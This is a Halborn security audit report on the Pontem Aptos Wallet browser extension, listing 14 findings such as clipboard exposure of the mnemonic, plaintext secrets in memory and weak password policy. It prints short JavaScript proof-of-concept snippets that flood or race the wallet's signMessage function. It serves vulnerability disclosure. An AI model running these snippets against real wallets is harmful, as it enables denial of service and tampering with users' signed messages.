Prepared by:
HALBORN
Last Updated 04/26/2024
Date of Engagement by: September 13th, 2022 - October 3rd, 2022
64% of all REPORTED Findings have been addressed
All findings
14
Critical
4
High
0
Medium
3
Low
4
Informational
3
\client engaged Halborn to conduct a security assessment on their web application, beginning on 2022-09-13 and ending on 2022-10-03. The security assessment was scoped to the Pontem Network - Aptos Wallet browser extension. Halborn was provided access to halborn-review-1 branch of the private GitHub repository of the Aptos Wallet for local deployment to conduct a security testing in the application and reporting the findings at the end of the engagement
The team at Halborn was provided two weeks for the engagement and assigned a full-time security engineer to audit the security of the Aptos Wallet application. The security engineer is a blockchain and smart-contract security expert with advanced penetration testing, smart-contract hacking, and deep knowledge of multiple blockchain protocols.
The purpose of this audit is to:
Improve the security of the application by testing it both as white and black-box approaches
Identify potential security issues that could be affecting the web application
In summary, Halborn identified some improvements to reduce the likelihood and impact of multiple risks, which have been partially addressed by \client. In addition, most of the critical issues were solved. The following list contains all the solved issues:
Browser Denial of Service related to signMessage function.
Race conditions occurring when signing multiple messages.
Lack of confirmation when signing messages with the wallet.
New accounts were not being registered on creation.
Clear-text passwords in source code.
Several vulnerable dependencies
Application dependencies were not pinned to exact versions.
Redundant if clause in source code.
However, Halborn identified some security risks that were accepted by the \client team:
Weak password policy.
Improper mnemonic verification on wallet creation process.
Some To-Do comments among the source code.
Finally, \client pointed out that some issues were going to be addressed in future releases of the application:
Access to confidential user data from the clipboard.
Unencrypted mnemonic phrase in memory (Demonic).
Unencrypted user password in memory.
Halborn performed a combination of manual and automated security testing to balance efficiency, timeliness, practicality, and accuracy in regard to the scope of this audit. While manual testing is recommended to uncover flaws in logic, process and implementation; automated testing techniques help enhance coverage of the code and can quickly identify items that do not follow security best practices.
The following phases and associated tools were used throughout the term of the audit:
Mapping Application Content and Functionality
Technology stack-specific vulnerabilities and Code Audit
Known vulnerabilities in 3rd party / OSS dependencies
Application Logic Flaws
Authentication / Authorization flaws
Input Handling
Fuzzing of all input parameters
Testing for different types of sensitive information leakages: memory, clipboard, ...
Test for Injection (SQL/JSON/HTML/JS/Command/Directories...)
Brute Force Attempts
Perform static analysis on code
Ensure that coding best practices are being followed by \client team
Technology stack-specific vulnerabilities and Code Audit
Known vulnerabilities in 3rd party / OSS dependencies.
Identify potential vulnerabilities that may pose a risk to \client
Pontem Network - Aptos Wallet:
\textbf{URL}: Private GitHub repository of the Aptos Wallet
\textbf{Environment}: halborn-review-1 branch.
Commit: f2e00bbdc0fd419139ca6c8a4b6d1b5aa2cab1d1 Send functionality (from graphical interface):
Commit: 8cdd90ec5fd57cbfaf9b412b89a329f310c10565
\textbf{Environment}: halborn-review-1 branch.
Commit: f2e00bbdc0fd419139ca6c8a4b6d1b5aa2cab1d1 Send functionality (from graphical interface):
Commit: 8cdd90ec5fd57cbfaf9b412b89a329f310c10565
SignAndSubmit functionality was not working during the assessment, making it impossible to confirm the correct behavior of the functionality. The functionality was tested in the commit f2e00bbdc0fd419139ca6c8a4b6d1b5aa2cab1d1 and 8cdd90ec5fd57cbfaf9b412b89a329f310c10565. Both commits did not allow confirm the correct operation of the functionality. The Pontem network team proposed to test the functionality on the tag v1.7.0, Halborn agreed to check this functionality on the proposed tag. The audit of the SignAndSubmit functionality was not possible to be tested on the tag v1.7.0, due to all the transactions tried using this version were on Pending status, making impossible the verification of the functionality.
Critical
4
High
0
Medium
3
Low
4
Informational
3
Impact x Likelihood
HAL-01
HAL-02
HAL-03
HAL-06
HAL-08
HAL-10
HAL-09
HAL-11
HAL-12
HAL-13
HAL-14
HAL-04
HAL-05
HAL-07
| Security analysis | Risk level | Remediation Date |
|---|---|---|
| CONFIDENTIAL DATA ACCESSIBLE ON THE CLIPBOARD | Critical | Future Release |
| POTENTIAL MEMORY LEAK ON `signMessage`- BROWSER DENIAL OF SERVICE | Critical | Solved - 10/10/2022 |
| RACE CONDITION ON SIGNED MESSAGE | Critical | Solved - 10/10/2022 |
| UN-ENCRYPTED USER PASSWORD IN-MEMORY | Critical | Future Release |
| CLEAR-TEXT PASSWORDS IN SOURCE CODE | Medium | Solved - 02/09/2023 |
| WEAK PASSWORD POLICY | Medium | Risk Accepted |
| VULNERABLE DEPENDENCIES | Medium | Solved - 02/21/2023 |
| DEPENDENCIES NOT PINNED TO AN EXACT VERSION | Low | Solved - 02/16/2023 |
| 'IF' CLAUSE RETURNING SAME VALUES | Low | Solved - 02/09/2023 |
| LACK OF MNEMONIC PHRASE VERIFICATION | Low | Risk Accepted |
| PRESENCE OF TO-DO COMMENTS ON THE CODE | Low | Risk Accepted |
| NO CONFIRMATION REQUIRED ON SIGNING MESSAGES | Informational | - |
| UNENCRYPTED MNEMONIC PHRASE IN-MEMORY (DEMONIC) | Informational | - |
| ACCOUNT NOT INITIALIZED ON CREATION | Informational | - |
// Critical
The Aptos wallet could allow an attacker to obtain the mnemonic passphrase from the clipboard storage. The attack paths could be considered local and remote. A Python script or other process could have access to the clipboard and obtain this sensitive information. Additionally, a malicious web page with clipboard access could be able to obtain the mnemonic passphrase and send it to the attacker.
PoC video: Mnemonic phrase leaked from clipboard using python script
PoC video: Mnemonic phrase leaked from clipboard using web browser
PENDING: The Pontem Network team stated that the recommendation will be followed in a future version of the code. Pontem Aptos Wallet may be at risk until the fixes have been reviewed and deployed.
// Critical
Pontem Aptos Wallet allowed an attacker to execute malicious code using the exported wallet functions, triggering a Denial of Service on the extension and the Browser (Chrome v105.0.5195.125).
An attacker could use the malicious code to call the wallet (locked and unlocked) to trigger a Denial of Service on the browser, closing the running process.
async function sign(){
window.pontem.signMessage('Signed message')
.then(result => {
console.log('Signed Message', result)
})
.catch(e => console.log('Error', e))
}
async function exploitDoS(){
for(i =0;i<1000000;i++){
sign()
}
}
SOLVED: The issue was solved in the following GitHub Pull Request (Commit 45429fb617843ccfbbab62dec76c77a4001ea73d):
Feature apt 643 #113
// Critical
The SignMessage exported function allowed an attacker to abuse the function and trigger a race condition state. The function did not control the function execution, allowing to execute multiple calls to the same function in a short period of time. This situation allowed an attacker to overwrite the content of the signed messages.
async function exploitSign(){
for (i = 1; i <= 5; i++) {
window.pontem.signMessage(i)
.then(result => {
console.log('Signed Message', result)
})
.catch(e => console.log('Error', e))
}
window.pontem.signMessage('Test1')
.then(result => {
console.log('Signed Message', result)
})
.catch(e => console.log('Error', e))
await new Promise(r => setTimeout(r, 1000));
window.pontem.signMessage('Test2')
.then(result => {
console.log('Signed Message', result)
})
.catch(e => console.log('Error', e))
}
SOLVED: The issue was solved in the following GitHub Pull Request (Commit 45429fb617843ccfbbab62dec76c77a4001ea73d):
Feature apt 643 #113
// Critical
The mnemonic phrase in the wallet is not encrypted in memory. As a result, an attacker who has compromised a users' machine can exfiltrate and steal users' wallet password.
This report only contains the vulnerabilities found within the Windows platform. The number of ways to exploit this on Windows were trigger than on Linux and MacOS. If the memory issues are fixed on the Windows platform, they will automatically also cater for those on Linux and MacOS.
The plain text user password is available in memory during various scenarios. Memory dumps were taken throughout the testing process. These memory dumps contained an exact replica of what was in memory while the application was open.
Making use of the strings tool on Linux, a search through the memory dump file revealed the plain text mnemonic phrase.
PENDING: The Pontem Network team stated that the recommendation will be followed in a future version of the code. Pontem Aptos Wallet may be at risk until the fixes have been reviewed and deployed.
Several improvements in the password's encryption were made in the following GitHub Pull Request: [Wallet] APT-757. Encrypt plain text password #297
// Medium
Hard-coded clear-text credentials were found in the source code. This is considered bad practice and may pose a risk for the application if a malicious user manages to access to some of them. Secrets should be securely stored and shared between the development team on a need to know basis. Additionally, these might be later re-used by someone and should they fall in the wrong hands, they could be used to access sensitive services and data.
HTTPS=true
BROWSER=none
REACT_APP_DEVELOPMENT_VAULT_PASSWORD=123456
SOLVED: The issue was solved in the following GitHub Commit: 6b1b114f104079ecec717fcca00ad8b485e28666 The \client team removed clear-text password from source code.
// Medium
There was no password policy enforced when user was setting up the password. Weak passwords are considered to be those that are short, employ common words, system/software defaults, or any terms that could be quickly guessed by executing a brute force attack using a subset of all possible passwords, such as dictionary words, proper nouns, username-based words, or common variations on these themes and even company-related.
It was possible to configure as user's password the following values:
0123456789000000aaaaaaabcdefThese values are considered as too weak passwords.
Weak password set up during the wallet creation
Due to lack of implementation of robust password policy (see the following vulnerabilities), it may be easy for an attacker to brute-force user accounts and compromise them.
RISK ACCEPTED: The Pontem Network team accepted the risk of the issue.
// Medium
Aptos Wallet uses multiple third-party dependencies. However, some of them were affected by public-known vulnerabilities that may pose a risk to the global application security level.
Although performed tests were mainly carried out from a black-box perspective, multiple vulnerable dependencies were found during the code review phase. Halborn considered them to be reported.
Listed below in more detail which dependencies are vulnerable and the vulnerability itself.
SOLVED: The issue was solved in the following GitHub Pull Request (Commit 08c13318d84766df8ef24e913802959b27401689): Fixed vulnerabilities deps #315
// Low
Aptos Wallet contains over 50 dependencies, some of them were not pinned to an exact version but set to compatible version (^x.x.x). This could potentially enable dependency attacks, as observed with the event-stream package with the Copay Bitcoin Wallet.
"dependencies": {
"@fortawesome/fontawesome-svg-core": "^6.1.1",
"@fortawesome/free-solid-svg-icons": "^6.1.1",
"@fortawesome/react-fontawesome": "^0.2.0",
"@metamask/browser-passworder": "^3.0.0",
"@metamask/jazzicon": "^2.0.0",
"@metamask/post-message-stream": "^6.0.0",
"@mui/icons-material": "^5.8.4",
"@mui/material": "^5.8.6",
"@testing-library/jest-dom": "^5.16.4",
"@testing-library/react": "^13.3.0",
"@testing-library/user-event": "^13.5.0",
"aptos": "^1.3.11",
"axios": "^0.27.2",
"bignumber.js": "^9.0.2",
"bip39": "^3.0.4",
"cipher-base": "^1.0.4",
"classnames": "^2.3.1",
"coinstring": "^2.3.0",
SOLVED: The issue was solved in the following GitHub Commit: 2297b72090b9672614a0402751099f1d000c81ee
// Low
The transaction.ts file contains a function called setTokenName. There was a condition evaluation that would return the same value in case of True or False. This behavior did not have any dangerous functionality; however, it could be used by other functionalities, and it could conclude in an uncontrolled behavior.
const setTokenName = (tx: UserTransaction, type: string): string => {
if (('type_arguments' in tx.payload) && tx.payload.type_arguments.length) {
const index = type === 'remove_liquidity' ? 1 : 0;
return prettifyTokenName(tx.payload.type_arguments[index].split('::').at(-1) as string);
} else if (aptosTxTypes.includes(type)) {
return 'Aptos';
} else {
return 'Aptos';
}
}
SOLVED: The issue was solved in the following GitHub Commit: 24a7aacea898459803e22479acd033890e2a8828
// Low
The Aptos Wallet did not have any mechanism to verify the provided mnemonic phrase during the wallet creation process after being copied by the user. Lack of this mechanism may pose a significant risk and end up in a fund loss, if the user saves incorrectly the passphrase or forgets to write it down securely.
RISK ACCEPTED: The Pontem Network team accepted this risk. Currently, the only implemented checks were a warning message showing “Please confirm mnemonic” and a button saying “Resolve”. The user was presented with this warning after the wallet creation. In case the user had not copied the phrase during the process, the wallet would have been created, and the user would not have access to it.
This verification must be implemented before creating the wallet, right after verifying the two input passwords are the same.
The Pontem Network team stated that this will also be implemented in a future release.
// Low
Multiple TO-DO comments were found on the code. From the security perspective, the use of these comments does not imply a security risk. However, it could mean that the developed application did not reach an appropriate level of maturity to be in a production environment.
const handleCopy = () => {
navigator.clipboard.writeText(tx.id)
.then(() => setSnackVisibility(true))
.catch(err => {
// TODO: add error handlers
});
}
RISK ACCEPTED: The Pontem Network team accepted the risk of this issue.
// Informational
// Informational
// Informational
Halborn strongly recommends conducting a follow-up assessment of the project either within six months or immediately following any material changes to the codebase, whichever comes first. This approach is crucial for maintaining the project’s integrity and addressing potential vulnerabilities introduced by code modifications.
// Download the full report
* Use Google Chrome for best results
** Check "Background Graphics" in the print settings if needed